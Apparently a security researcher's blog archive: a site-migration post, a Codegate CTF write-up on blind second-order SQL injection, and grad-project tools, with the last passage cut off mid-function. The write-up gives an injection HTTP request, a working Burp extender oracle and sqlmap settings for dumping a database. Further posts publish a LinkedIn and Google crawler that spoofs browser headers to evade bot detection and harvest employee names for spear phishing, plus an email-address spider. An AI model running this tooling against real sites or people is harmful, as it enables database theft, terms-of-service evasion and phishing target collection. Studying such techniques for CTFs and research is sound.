Hello WordPress.com

This is the third reincarnation of this website.  It’s amazing how time flies by.

V1

Built early 2007 on websitebaker, I self hosted this on various available university computers. At the time I was working as a Linux sysadmin and going to school. I liked websitebaker because of how simple it was to customize and figure out how it worked.  Here is a post on the theme.

V2

Built in mid 2009 when I was leaving the university to go work for IOActive in Seattle, I needed a new place for hosting which I had been getting for free. I went with site5 largely because it was cheap (around $5/month), and it had ssh access so I could migrate fairly easily (e.g. leaving all files in the same structure). I also migrated from websitebaker to wordpress, which is a huge improvement in my opinion. With the wife’s help, I wrote the Ryu theme as a modification of the existing theme.

V3

I don’t get a lot of traffic, but when I do get bursts then site5 seems to struggle. I’m working on some things I think are neat lately (coming soon! I’m planning on putting more effort here than I ever have before)  and I want the website to stay responsive if I ever get slashdotted or something. I ultimately wanted to stay with wordpress as the cms but was willing to try others. I looked at/considered EC2, Media Temple, and Blogger. In the end, I think WordPress.com is the best fit. It has a low price tag ($30/yr for no ads, $30/yr for custom css, and $15/yr so I can use my domain). Besides scalability, I just feel like if I tried I could hack site5 and that scares me. I did find a wordpress bug one time, but when I was looking for it I was pretty impressed with the general code quality.

My big reservation with wordpress.com was that I couldn’t upload arbitrary files to share, but with things like skydrive (which I use), dropbox, google drive, and Amazon’s services it make sense to separate that piece and link to that content. I spent a lot of time this weekend working to get the new setup (my lovely wife also helped with the CSS), and I think it’s generally looking pretty good :)

Blind Second Order SQL Injection with Burp and SqlMap

My favorite challenge on codegate this year was a second order SQL injection (yes, the ‘easy’ 100 level one). It wasn’t blind – that was even one of the hints early on. But I got to thinking about how I would exploit a blind second order SQL injection, and I decided to go that route. It’s something I’d never done before, and I thought it was an interesting problem. (I go off on tangents a lot – acme is awesome for still letting me be a pretty much non-contributing member of their team).

The Injection

The scenario was an mp3 player application, and the goal was to get what the admin was listening to. The injectable query is here, in the genre parameter:

POST /mp3_world/index.php?page=upload HTTP/1.1
Host: 1.237.174.123:3333
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 404

-----------------------------265001916915724
Content-Disposition: form-data; name="mp3"; filename='badfi"le.mp3'
Content-Type: text/plain

bad'"
-----------------------------265001916915724
Content-Disposition: form-data; name="genre"

if(1=1 ,1, 2)
-----------------------------265001916915724
Content-Disposition: form-data; name="title"

9 95
-----------------------------265001916915724--

Notice the  if(1=1 ,1, 2). In a second response, it will show [hiphop] if the query evaluates to true, and something else if it’s not true.

So the right way to proceed is to see if you can get information into the data output (e.g. the non-blind route). But say this is all the information you had, an oracle on another page from the request; an injection in request 1 and an oracle in response 2. Obviously, this is still exploitable, but how?

Extending Burp to Return the Oracle to an Injection Request

So here’s the strategy:

  • Do the injection request.
  • The response for the first request is meaningless – there’s no injection there. Throw it away and replace it with a response from a separate request that triggers the injection. Here, I just return TRUE if 1=1, False if not. Tools like sqlmap can work with this for blind sqli
  • Clean up; because the oracle is stored, we need to clean up old oracles that indicate whether the comparison was successful

The following code does this:

package burp;

import java.net.*;
import java.util.*;
import java.util.regex.*;
import java.io.*;

public class BurpExtender
{
    public IBurpExtenderCallbacks mCallbacks;

    //victimRequest is the value that triggers the alternate response
    public static String victimRequest = "1.237.174.123";
    //replacementResponse replaces the response with this new one
    public static String replacementResponse = "http://1.237.174.123:3333/mp3_world/?page=player";
    public static String injectionOracle = "[hiphop]";
    public static String deleteOld = "http://1.237.174.123:3333/mp3_world/?page=upload&del=";

    public void processHttpMessage(String toolName, boolean messageIsRequest, IHttpRequestResponse messageInfo)
    {
        if (!messageIsRequest)
        {
            if (messageInfo.getHost().equals(victimRequest))
            {
                boolean respvalue = false;
                try {
                    //assume this is our sql injection response; make a second request to return
                    System.out.println("This request needs a modified response");
                    //make a request to the second order to see if True or False
                    //with this one, no need for cookies or anything - it's based on IP
                    URL sqlcheck = new URL(replacementResponse);
                    URLConnection sc = sqlcheck.openConnection();
                    BufferedReader in = new BufferedReader(new InputStreamReader(sc.getInputStream()));

                    String inputLine;
                    String delIndex = "";
                    //if injectionOracle is in sqlcheck response, and the resp number in the title true. If not, false
                    while ((inputLine = in.readLine()) != null)
                    {
                        if (inputLine.contains(injectionOracle))
                            respvalue = true;
                        //grab all the indexes so we can delete them later = format "idx=?"
                        if (inputLine.contains("idx="))
                        {
                            int sindex = inputLine.indexOf("idx=");
                            int eindex = inputLine.indexOf(""", sindex);
                            delIndex = inputLine.substring(sindex+4, eindex);
                        }
                    }
                    in.close();
                    String resp;
                    if (respvalue)
                        resp = "True";
                    else
                        resp = "False";
                    byte[] bResp = resp.getBytes();

                    messageInfo.setResponse(bResp);

                    //Clean up old songs
                    System.out.println("Deleting " + delIndex);
                    String delstr = deleteOld + delIndex;
                    URL delRequest = new URL(delstr);
                    URLConnection deslc = delRequest.openConnection();
                    in = new BufferedReader(new InputStreamReader(deslc.getInputStream()));
                    in.close();

                }
                catch (java.io.IOException ex){
                    System.out.println("something's wrong");
                }
                catch (java.lang.Exception ex){
                    System.out.println("something else is wrong");
                }
            }
        }

    }

    public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks)
    {
        mCallbacks = callbacks;
    }
}

To compile, it should look like this (the source file is BurpExtender.java). Here’s a command dump as a sanity check


PS C:UsersmopeyDocumentscodeburp_pluginssql_injection> ls

Directory: C:UsersmopeyDocumentscodeburp_pluginssql_injection

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         2/25/2012   5:00 PM            burp
-a---         2/25/2012   5:00 PM       6445 BurpExtender.java
-a---         2/25/2012   3:47 PM        571 requestfile.ini
-a---         2/25/2012   6:16 PM      17168 sqlmap.config

PS C:UsersmopeyDocumentscodeburp_pluginssql_injection> javac .BurpExtender.java
Note: .BurpExtender.java uses or overrides a deprecated API.
Note: Recompile with -Xlint:deprecation for details.
PS C:UsersmopeyDocumentscodeburp_pluginssql_injection> rm .burpBurpExtender.class
PS C:UsersmopeyDocumentscodeburp_pluginssql_injection> mv .BurpExtender.class .burp
PS C:UsersmopeyDocumentscodeburp_pluginssql_injection> jar -cf .burpextender.jar .burpBurpExtender.class
PS C:UsersmopeyDocumentscodeburp_pluginssql_injection> cd .burp
PS C:UsersmopeyDocumentscodeburp_pluginssql_injectionburp> ls

Directory: C:UsersmopeyDocumentscodeburp_pluginssql_injectionburp

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         2/25/2012   7:37 PM       4062 BurpExtender.class
-a---         2/24/2012  11:51 PM        345 burpextender.jar
-a---          6/3/2011   7:56 AM       7919 IBurpExtender.java
-a---         2/24/2012  11:19 PM       1587 IBurpExtenderCallbacks.class
-a---         2/24/2012  11:04 PM      13131 IBurpExtenderCallbacks.java
-a---         2/24/2012  11:19 PM        659 IHttpRequestResponse.class
-a---          6/3/2011   7:55 AM       4040 IHttpRequestResponse.java
-a---         2/24/2012  11:19 PM        196 IMenuItemHandler.class
-a---          6/3/2011   7:56 AM       1453 IMenuItemHandler.java
-a---         2/24/2012  11:19 PM        477 IScanIssue.class
-a---          6/3/2011   7:56 AM       2826 IScanIssue.java
-a---         2/24/2012  11:19 PM        347 IScanQueueItem.class
-a---          6/3/2011   7:56 AM       2309 IScanQueueItem.java

Then to run:

java -Xmx512m -classpath burpextender.jar;burpsuite_pro_v1.4.05.jar burp.StartBurp

With this, you can make requests with Burp and it returns True or False in the single response.

Fenangling sqlmap

It took a little more work to get sqlmap working happily. One annoying thing is Burp’s proxy. It has a match and replace, but it doesn’t work well with multiple line things. Also, sqlmap doesn’t play well with multi-part forms.

I ended up using the extender more, and matching on words like how the match and replace in Burp’s proxy should work. This is a common trick, but it nearly doubled the code above to make everything happy (think multiple wrong content-lengths and url decodings and whatnot).

That said, the idea is straightforward. My base request looked something like this, and sqlmap was injecting into the ’1′. By the way, the syntax is MySql.

asdfghbleh=1&aftercrap=crap

Replace asdfghbleh= with “if (1=”

Replaces &aftercrap=crap with “,1,2)”

So, for example, the base query has (in the genre param)

if (1=1, 1, 2)

Sqlmap is happy at this point, and you can run arbitrary queries. When running sqlmap, I generally like to use the config file. Here are some of the changes for the initial sql injection detection.


#Base request from repeater with tags
requestFile = requestfile.ini
proxy = http://localhost:8080
testParameter = asdfghbleh
dbms = mysql
tech = B

After a happy base run, I enumerated databases, tables, and columns just like usual. As expected, it took a while to actually get information out (on the order of a couple hours) but I still think this is pretty slick. If this were actually blind I imagine it would be rated harder than 100 level. Dumping everything at once is way more efficient and all, but every time sqlmap decodes an arbitrary character, all I see anymore is blonde, brunette, redhead…

Linkedin Crawler

The following is also source used in the grad project. I’ll post the actual paper at some point. But here is the linkedin crawler portion with the applicable source. By it’s nature, this code is breakable, and may not work even at the time of posting. But it did work long enough for me to gather addresses, which was the point.

Usage is/was

LinkedinPageGatherer.py Linkedinusername Linkedinpassword

Following is an excerpt from the ‘paper’.

the HTMLParser libraries are more resilient to changes in source. Both HTMLParser and lxml libraries have different code available to process broken HTML. The HTMLParser libraries were chosen as more appropriate for these problems [lxml][htmlparsing].

There has been an effort to put all HTML specific logic in debuggable places so if the HTML generated changes then it is easy to modify the code parsing to reflect those changes (assuming equivalent information is available). However, changes in source are frequent, and the source code has had to be modified roughly every 3 months to reflect changes in HTML layout.

Unfortunately, although the functionality is simple, this program has grown to be much more complex due to roadblocks put in place by both LinkedIn Google.

To search LinkedIn from itself, it is necessary to have a LinkedIn account. With an account, it is possible to search with or without connections, although the searching criteria differ depending on the type of account you have. Because of this, one of the criteria for searching LinkedIn is cookie management, which has to be written to keep track of the HTTP session. In addition, LinkedIn uses a POST parameter nonce at each page that must be retrieved and POSTed for every page submission. Because of the nonce, it is also necessary to login at the login page, save the nonce and the cookie, and proceed to search through the same path an actual user would.

Once the tool is able to search for companies, there is an additional limitation. With the free account, the search is limited to displaying only 100 connections. This is inconvenient as the desired number of actual connections is often much larger. The tool I’ve written takes various criteria (such as location, title, etc) to perform multiple more specific searches of 100 results each. The extra information is harvested at each search to use for later searches. With more specific searches, the tool inserts unique items into a list of users. When the initial search initiates, LinkedIn reports the total number of results (although it only lets the account view 100 at a time) so the tool uses this total number as one possible stopping condition – when a percentage of that number has been reached or a certain number of failed searches have been tried.

This is easier to illustrate with an example. In the case of FPL, there are over 2000 results. However, it can be asserted that at least one of the results is from a certain Miami address. Using this as a search restriction the total results may be reduced to 500, the first 100 of which can be inserted. It can also be asserted that there is at least one result from the Miami address who is a project manager. Using this restriction, there are only 5 results, which have different criteria to do advanced searches on. Using this iterative approach, it is possible to gather most of the 2000. In the program I have written, this functionality is still experimental and the parameters must be adjusted.

One additional difficulty with LinkedIn is that with these results it does not display a name, only a job title associated with the company. Obviously, this is not ideal. A name is necessary for even the most basic spear phishing attacks. An email may sound slightly awkward if addressed as “Dear Project Manager in the Cyber Security Group”. The solution I found to retrieve employee names is to use Google. Using specific Google queries based on the LinkedIn names, it is possible to retrieve the names associated with a job, company, and job title.

Google has a use policy prohibiting automated crawlers. Because of this policy, it does various checks on the queries to verify that the browser is a known real browser. If it is not, Google returns a 403 status stating that the browser is not known. To circumvent this, a packet dump was performed on a valid browser. The code now has a snippet to send information exactly like an actual browser would along with randomized time delays to mimic a person. It should be impossible for Google to tell the difference over the long run – whatever checks they do can be mimicked. The code includes several configurable browsers to masquerade as. Below is the code snippet including the default spoofed browser which is Firefox running on Linux.

def getHeaders(self, browser="ubuntuFF"):
  #ubuntu firefox spoof
  if browser == "ubuntuFF":
    headers = {
      "Host": "www.google.com",
      "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5",
      "Accept" : "text/html,application/xhtml+xml,application xml;q=0.9,*/*;q=0.8",
      "Accept-Language" : "en-us,en;q=0.5",
      "Accept-Charset" : "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
      "Keep-Alive" : "300",
      "Proxy-Connection" : "keep-alive"
    }
...

Although both Google and LinkedIn make it difficult to automate information mining, their approach will fundamentally fail a motivated adversary. Because these companies want to make information available to users, this information can also be retrieved automatically. Captcha technology has been one traditional solution, though by its nature it suffers from similar flaws in design.

The LinkedIn crawler program demonstrates the possibility of an attacker targeting a company to harvest people’s names, which many times can be mapped to email addresses as demonstrated in previous sections.

GoogleQueery.py

#! /usr/bin/python

#class to make google queries
#must masquerade as a legitimate browser
#Using this violates Google ToS

import httplib
import urllib
import sys
import HTMLParser
import re

#class is basically fed a google url for linkedin for the
#sole purpose of getting a linkedin link
class GoogleQueery(HTMLParser.HTMLParser):
  def __init__(self, goog_url):
    HTMLParser.HTMLParser.__init__(self)
    self.linkedinurl = []
    query = urllib.urlencode({"q": goog_url})
    conn = httplib.HTTPConnection("www.google.com")
    headers = self.getHeaders()
    conn.request("GET", "/search?hl=en&"+query, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    self.feed(data)
    self.get_num_results(data)
    conn.close()

  #this is necessary because google wants to be mean and 403 based on... not sure
  #but it seems  I must look like a real browser to get a 200
  def getHeaders(self, browser="chromium"):
    #if browser == "random":
      #TODO randomize choice
    #ubuntu firefox spoof
    if browser == "ubuntuFF":
      headers = {
        "Host": "www.google.com",
        "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5",
        "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language" : "en-us,en;q=0.5",
        "Accept-Charset" : "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
        "Keep-Alive" : "300",
        "Proxy-Connection" : "keep-alive"
        }
    elif browser == "chromium":
      headers = {
        "Host": "www.google.com",
        "Proxy-Connection": "keep-alive",
        "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.5 Safari/533.2",
        "Referer": "http://www.google.com/",
        "Accept": "application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
        "Avail-Dictionary": "FcpNLYBN",
        "Accept-Language": "en-US,en;q=0.8",
        "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3"
      }
    elif browser == "ie":
      headers = {
        "Host": "www.google.com",
        "Proxy-Connection": "keep-alive",
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
        "Referer": "http://www.google.com/",
        "Accept": "application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
        "Accept-Language": "en-US,en;q=0.8",
        "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3"
      }
    return headers

  def get_num_results(self, data):
    index = re.search("<b>1</b> - <b>[d]+</b> of [w]*[ ]?<b>([d,]+)", data)
    try:
      self.numResults = int(index.group(1).replace(",", ""))
    except:
      self.numResults = 0
      if not "- did not match any documents. " in data:
        print "Warning: numresults parsing problem"
        print "setting number of results to 0"

  def handle_starttag(self, tag, attrs):
    try:
      if tag == "a" and ((("linkedin.com/pub/" in attrs[0][1])
                    or  ("linkedin.com/in" in attrs[0][1]))
                    and ("http://" in attrs[0][1])
                    and ("search?q=cache" not in attrs[0][1])
                    and ("/dir/" not in attrs[0][1])):
        self.linkedinurl.append(attrs[0][1])
        #print self.linkedinurl
      #perhaps add a google cache option here in the future
    except IndexError:
      pass

#for testing
if __name__ == "__main__":
  #url = "site:linkedin.com "PROJECT ADMINISTRATOR at CAT INL QATAR W.L.L." "Qatar""
  m = GoogleQueery(url)

LinkedinHTMLParser.py

#! /usr/bin/python

#this should probably be put in LinkedinPageGatherer.py

import HTMLParser

from person_searchobj import person_searchobj

class LinkedinHTMLParser(HTMLParser.HTMLParser):
  """
  subclass of HTMLParser specifically for parsing Linkedin names to person_searchobjs
  requires a call to .feed(data), stored data in the personArray
  """
  def __init__(self):
    HTMLParser.HTMLParser.__init__(self)
    self.personArray = []
    self.personIndex = -1
    self.inGivenName = False
    self.inFamilyName = False
    self.inTitle = False
    self.inLocation = False

  def handle_starttag(self, tag, attrs):
    try:
      if tag == "li" and attrs[0][0] == "class" and ("vcard" in attrs[0][1]):
        self.personIndex += 1
        self.personArray.append(person_searchobj())
      if attrs[0][1] == "given-name" and self.personIndex >=0:
        self.inGivenName = True
      elif attrs[0][1] == "family-name" and self.personIndex >= 0:
        self.inFamilyName = True
      elif tag == "dd" and attrs[0][1] == "title" and self.personIndex >= 0:
        self.inTitle = True
      elif tag == "span" and attrs[0][1] == "location" and self.personIndex >= 0:
        self.inLocation = True
    except IndexError:
      pass

  def handle_endtag(self, tag):
    if tag == "span":
      self.inGivenName = False
      self.inFamilyName = False
      self.inLocation = False
    elif tag == "dd":
      self.inTitle = False

  def handle_data(self, data):
    if self.inGivenName:
      self.personArray[self.personIndex].givenName = data.strip()
    elif self.inFamilyName:
      self.personArray[self.personIndex].familyName = data.strip()
    elif self.inTitle:
      self.personArray[self.personIndex].title = data.strip()
    elif self.inLocation:
      self.personArray[self.personIndex].location = data.strip()

#for testing - use a file since this is just a parser
if __name__ == "__main__":
  import sys
  file = open ("test.htm")
  df = file.read()
  parser = LinkedinHTMLParser()
  parser.feed(df)
  print "================"
  for person in parser.personArray:
    print person.goog_printstring()
  file.close()

LinkedinPageGatherer.py – this is what should be called directly.

#!/usr/bin/python

import urllib
import urllib2
import sys
import time
import copy
import pickle
import math

from person_searchobj import person_searchobj
from LinkedinHTMLParser import LinkedinHTMLParser
from GoogleQueery import GoogleQueery

#TODO add a test function that tests the website format for easy diagnostics when HTML changes
#TODO use HTMLParser like a sane person
class LinkedinPageGatherer:
  """
  class that generates the initial linkeding queeries using the company name
  as a search parameter. These search strings will be searched using google
  to obtain additional information (these limited initial search strings usually lack
  vital info like names)
  """
  def __init__(self, companyName, login, password, maxsearch=100,
               totalresultpercent=.7, maxskunk=100):
    """
    login and password are params for a valid linkedin account
    maxsearch is the number of results - linkedin limit unpaid accounts to 100
    totalresultpercent is the number of results this script will try to find
    maxskunk is the number of searches this class will attempt before giving up
    """
    #list of person_searchobj
    self.people_searchobj = []
    self.companyName = companyName
    self.login = login
    self.password = password
    self.fullurl = ("http://www.linkedin.com/search?search=&company="+companyName+
                    "&currentCompany=currentCompany", "&page_num=", "0")
    self.opener = self.linkedin_login()
    #for the smart_people_adder
    self.searchSpecific = []
    #can only look at 100 people at a time. Parameters used to narrow down queries
    self.total_results = self.get_num_results()
    self.maxsearch = maxsearch
    self.totalresultpercent = totalresultpercent
    #self.extraparameters = {"locationinfo" : [], "titleinfo" : [], "locationtitle" : [] }
    #extraparameters is a simple stack that adds keywords to restrict the search
    self.extraparameters = []
    #TODO can only look at 100 people at a time - like to narrow down queries
    #and auto grab more
    currrespercent = 0.0
    skunked = 0
    currurl = self.fullurl[0] + self.fullurl[1]
    extraparamindex = 0

    while currrespercent < self.totalresultpercent and skunked <= maxskunk:
      numresults = self.get_num_results(currurl)
      save_num = len(self.people_searchobj)

      print "-------"
      print "currurl", currurl
      print "percentage", currrespercent
      print "skunked", skunked
      print "numresults", numresults
      print "save_num", save_num

      for i in range (0, int(min(math.ceil(self.maxsearch/10), math.ceil(numresults/10)))):
        #function adds to self.people_searchobj
        print "currurl" + currurl + str(i)
        self.return_people_links(currurl + str(i))
      currrespercent = float(len(self.people_searchobj))/self.total_results
      if save_num == len(self.people_searchobj):
        skunked += 1
      for i in self.people_searchobj:
        pushTitles = [("title", gName) for gName in i.givenName.split()]
        #TODO this could be inproved for more detailed results, etc, but keeping it simple for now
        pushKeywords = [("keywords", gName) for gName in i.givenName.split()]
        pushTotal = pushTitles[:] + pushKeywords[:]
        #append to extraparameters if unique
        self.push_search_parameters(pushTotal)
      print "parameters", self.extraparameters
      #get a new url to search for, if necessary
      #use the extra params in title, "keywords" parameters
      try:
        refineel = self.extraparameters[extraparamindex]
        extraparamindex += 1
        currurl = self.fullurl[0] + "&" + refineel[0] + "=" + refineel[1] + self.fullurl[1]
      except IndexError:
        break

  """
  #TODO: This idea is fine, but we should get names first to better distinguish people
  #also maybe should be moved
  def smart_people_adder(self):
    #we've already done a basic search, must do more
    if "basic" in self.searchSpecific:
  """
  def return_people_links(self, linkedinurl):
    req = urllib2.Request(linkedinurl)
    fd = self.opener.open(req)
    pagedata = ""
    while 1:
      data = fd.read(2056)
      pagedata = pagedata + data
      if not len(data):
        break
    #print pagedata
    self.parse_page(pagedata)

  def parse_page(self, page):
    thesePeople = LinkedinHTMLParser()
    thesePeople.feed(page)
    for newperson in thesePeople.personArray:
      unique = True
      for oldperson in self.people_searchobj:
        #if all these things match but they really are different people, they
        #will likely still be found as unique google results
        if (oldperson.givenName == newperson.givenName and
            oldperson.familyName == newperson.familyName and
            oldperson.title == newperson.title and
            oldperson.location == oldperson.location):
              unique = False
              break
      if unique:
        self.people_searchobj.append(newperson)
  """
    print "======================="
    for person in self.people_searchobj:
      print person.goog_printstring()
  """

  #return the number of results, very breakable
  def get_num_results(self, url=None):
    #by default return total in company
    if url == None:
      fd = self.opener.open(self.fullurl[0] + "1")
    else:
      fd = self.opener.open(url)
    data = fd.read()
    fd.close()
    searchstr = "<p class="summary">"
    sindex = data.find(searchstr) + len(searchstr)
    eindex = data.find("</strong>", sindex)
    return(int(data[sindex:eindex].strip().strip("<strong>").replace(",", "").strip()))

  #returns an opener object that contains valid cookies
  def linkedin_login(self):
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
    urllib2.install_opener(opener)
    #login page
    fd = opener.open("https://www.linkedin.com/secure/login?trk=hb_signin")
    data = fd.read()
    fd.close()
    #csrf 'prevention' login value
    searchstr = """<input type="hidden" name="csrfToken" value="ajax:"""
    sindex = data.find(searchstr) + len(searchstr)
    eindex = data.find('"', sindex)
    params = urllib.urlencode(dict(csrfToken="ajax:-"+data[sindex:eindex],
                              session_key=self.login,
                              session_password=self.password,
                              session_login="Sign+In",
                              session_rikey=""))
    #need the second request to get the csrf stuff, initial cookies
    request = urllib2.Request("https://www.linkedin.com/secure/login")
    request.add_header("Host", "www.linkedin.com")
    request.add_header("Referer", "https://www.linkedin.com/secure/login?trk=hb_signin")
    time.sleep(1.5)
    fd = opener.open(request, params)
    data = fd.read()
    if "<div id="header" class="guest">" in data:
      print "Linkedin authentication faild. Please supply a valid linkedin account"
      sys.exit(1)
    else:
      print "Linkedin authentication Successful"
    fd.close()
    return opener

  def push_search_parameters(self, extraparam):
    uselesswords = [ "for", "the", "and", "at", "in"]
    for pm in extraparam:
      pm = (pm[0], pm[1].strip().lower())
      if (pm not in self.extraparameters) and (pm[1] not in uselesswords) and pm != None:
        self.extraparameters.append(pm)

class LinkedinTotalPageGather(LinkedinPageGatherer):
  """
  Overhead class that generates the person_searchobjs, using GoogleQueery
  """
  def __init__(self, companyName, login, password):
    LinkedinPageGatherer.__init__(self, companyName, login, password)
    extraPeople = []
    for person in self.people_searchobj:
      mgoogqueery = GoogleQueery(person.goog_printstring())
      #making the assumption that each pub url is a unique person
      count = 0
      for url in mgoogqueery.linkedinurl:
        #grab the real name from the url
        begindex = url.find("/pub/") + 5
        endindex = url.find("/", begindex)
        if count == 0:
          person.url = url
          person.name = url[begindex:endindex]
        else:
          extraObj = copy.deepcopy(person)
          extraObj.url = url
          extraObj.name = url[begindex:endindex]
          extraPeople.append(extraObj)
        count += 1
      print person
    print "Extra People"
    for person in extraPeople:
      print person
      self.people_searchobj.append(person)

if __name__ == "__main__":
  #args are email and password for linkedin
  my = LinkedinTotalPageGather(company, sys.argv[1], sys.argv[2])

person_searchobj.py

#! /usr/bin/python

class person_searchobj():
  """this object is used for the google search and the final person object"""

  def __init__ (self, givenname="", familyname="", title="", organization="", location=""):
    """
    given name could be a title in this case, does not matter in terms of google
    but then may have to change for the final person object
    """
    #"name" is their actual name, unlike givenName and family name which are linkedin names
    self.name = ""
    self.givenName = givenname
    self.familyName = familyname
    self.title = title
    self.organization = organization
    self.location = location

    #this is retrieved by GoogleQueery
    self.url = ""

  def goog_printstring(self):
    """return the google print string used for queries"""
    retrstr = "site:linkedin.com "
    for i in  [self.givenName, self.familyName, self.title, self.organization, self.location]:
      if i != "":
        retrstr += '"' + i +'" '
    return retrstr

  def __repr__(self):
    """Overload __repr__ for easy printing. Mostly for debugging"""
    return (self.name + "n" +
            "------n"
            "GivenName: " + self.givenName + "n" +
            "familyName:" + self.familyName + "n" +
            "Title:" + self.title + "n" +
            "Organization:" + self.organization + "n" +
            "Location" + self.location + "n" +
            "URL:" + self.url + "nn")

email_spider

This was a small part of a project that was itself about 1/3 of my graduate project. I used it to collect certain information. Here is the excerpt from the paper.

Website Email Spider Program

In order to automatically process publicly available email addresses, a simple tool was developed, with source code available in Appendix A. An automated tool is able to process web pages in a way that is less error prone than manual methods, and it also makes processing the sheer number of websites possible (or at least less tedious).
This tool begins at a few root pages, which can be comma delimited. From these, it searches for all unique links by keeping track of a queue so that pages are not usually revisited (although revisiting a page is still possible in case the server is case insensitive or equivalent pages are dynamically generated with unique URLs). In addition, the base class is passed a website scope so that pages outside of that scope are not spidered. By default, the scope is simply a regular expression including the top domain name of the organization.

Each page requested searches the contents for the following regular expression to identify common email formats:

[w_.-]{3,}@[w_.-]{6,}

The 3 and 6 repeaters were necessary because of false positives otherwise obtained due to various encodings. This regular expression will not obtain all email addresses. However, it will obtain the most common addresses with a minimum of false positives. In addition, the obtained email addresses are run against a blacklist of uninteresting generic form addresses (such as help@example.com, info@example.com, or sales@example.com).

These email addresses are saved in memory and reported when the program completes or is interrupted. Note because of the dynamic nature of some pages, these can potentially spider infinitely and must be interrupted (for example, a calendar application that uses links to go back in time indefinitely). Most emails seemed to be obtained in the first 1,000 pages crawled. A limit of 10,000 pages was chosen as a reasonable scope. Although this limit was reached several times, the spider program uses a breadth search method. It was observed that most unique addresses were obtained early in the spidering process, and extending the number of pages tended to have a diminishing return. Despite this, websites with more pages also tended to correlate with greater email addresses returned (see analysis section).

Much of the logic in the spidering tool is dedicated to correctly parsing html. By their nature, web pages vary widely with links, with many sites using a mix of directory traversal, absolute URLs, and partial URLs. It is no surprise there are so many security vulnerabilities related to browsers parsing this complex data.
There is also an effort made to make the software somewhat more efficient by ignoring superfluous links to objects such as documents, executables, etc. Although if such a file is encountered an exception will catch the processing error, these files consume resources.

Using this tool is straightforward, but a certain familiarity is expected – it was not developed for an end user but for this specific experiment. For example, a URL is best processed in the format http://example.com/ since in its current state it would use example.com to verify that spidered addresses are within a reasonable scope. It prints debugging messages constantly because every site seemed to have unique parsing quirks. Although other formats and usages may work, there was little effort to make this software easy to use.

Here is the source.

#!/usr/bin/python

import HTMLParser
import urllib2
import re
import sys
import signal
import socket

socket.setdefaulttimeout(20)

#spider is meant for a single url
#proto can be http, https, or any
class PageSpider(HTMLParser.HTMLParser):
  def __init__(self, url, scope, searchList=[], emailList=[], errorDict={}):
    HTMLParser.HTMLParser.__init__(self)
    self.url = url
    self.scope = scope
    self.searchList = searchList
    self.emailList = emailList
    try:
      urlre = re.search(r"(w+):[/]+([^/]+).*", self.url)
      self.baseurl = urlre.group(2)
      self.proto = urlre.group(1)
    except AttributeError:
      raise Exception("URLFormat", "URL passed is invalid")
    if self.scope == None:
      self.scope = self.baseurl
    try:
      req = urllib2.urlopen(self.url)
      htmlstuff = req.read()
    except KeyboardInterrupt:
      raise
    except urllib2.HTTPError:
      #not able to fetch a url eg 404
      errorDict["link"] += 1
      print "Warning: link error"
      return
    except urllib2.URLError:
      errorDict["link"] += 1
      print "Warning: URLError"
      return
    except ValueError:
      errorDict["link"] += 1
      print "Warning link error"
      return
    except:
      print "Unknown Error", self.url
      errorDict["link"] += 1
      return
    emailre = re.compile(r"[w_.-]{3,}@[w_.-]{2,}.[w_.-]{2,}")
    nemail = re.findall(emailre, htmlstuff)
    for i in nemail:
      if i not in self.emailList:
        self.emailList.append(i)
    try:
      self.feed(htmlstuff)
    except HTMLParser.HTMLParseError:
      errorDict["parse"] += 1
      print "Warning: HTML Parse Error"
      pass
    except UnicodeDecodeError:
      errorDict["decoding"] += 1
      print "Warning: Unicode Decode Error"
      pass
  def handle_starttag(self, tag, attrs):
    if (tag == "a" or tag =="link") and attrs:
      #process the url formats, make sure the base is in scope
      for k, v in attrs:
        #check it's an htref and that it's within scope
        if  (k == "href" and
            ((("http" in v) and (re.search(self.scope, v))) or
            ("http" not in v)) and
            (not (v.endswith(".pdf") or v.endswith(".exe") or
             v.endswith(".doc") or v.endswith(".docx") or
             v.endswith(".jpg") or v.endswith(".jpeg") or
             v.endswith(".png") or v.endswith(".css") or
             v.endswith(".gif") or v.endswith(".GIF") or
             v.endswith(".mp3") or v.endswith(".mp4") or
             v.endswith(".mov") or v.endswith(".MOV") or
             v.endswith(".avi") or v.endswith(".flv") or
             v.endswith(".wmv") or v.endswith(".wav") or
             v.endswith(".ogg") or v.endswith(".odt") or
             v.endswith(".zip") or v.endswith(".gz") or
             v.endswith(".bz") or v.endswith(".tar") or
             v.endswith(".xls") or v.endswith(".xlsx") or
             v.endswith(".qt") or v.endswith(".divx") or
             v.endswith(".JPG") or v.endswith(".JPEG")))):
          #Also todo - modify regex so that >= 3 chars in front >= 7 chars in back
          url = self.urlProcess(v)
          #TODO 10000 is completely arbitrary
          if (url not in self.searchList) and (url != None) and len(self.searchList) < 10000:
            self.searchList.append(url)
  #returns complete url in the form http://stuff/bleh
  #as input handles (./url, http://stuff/bleh/url, //stuff/bleh/url)
  def urlProcess(self, link):
    link = link.strip()
    if "http" in link:
      return (link)
    elif link.startswith("//"):
      return self.proto + "://" + link[2:]
    elif link.startswith("/"):
      return self.proto + "://" + self.baseurl + link
    elif link.startswith("#"):
      return None
    elif ":" not in link and " " not in link:
      while link.startswith("../"):
        link = link[3:]
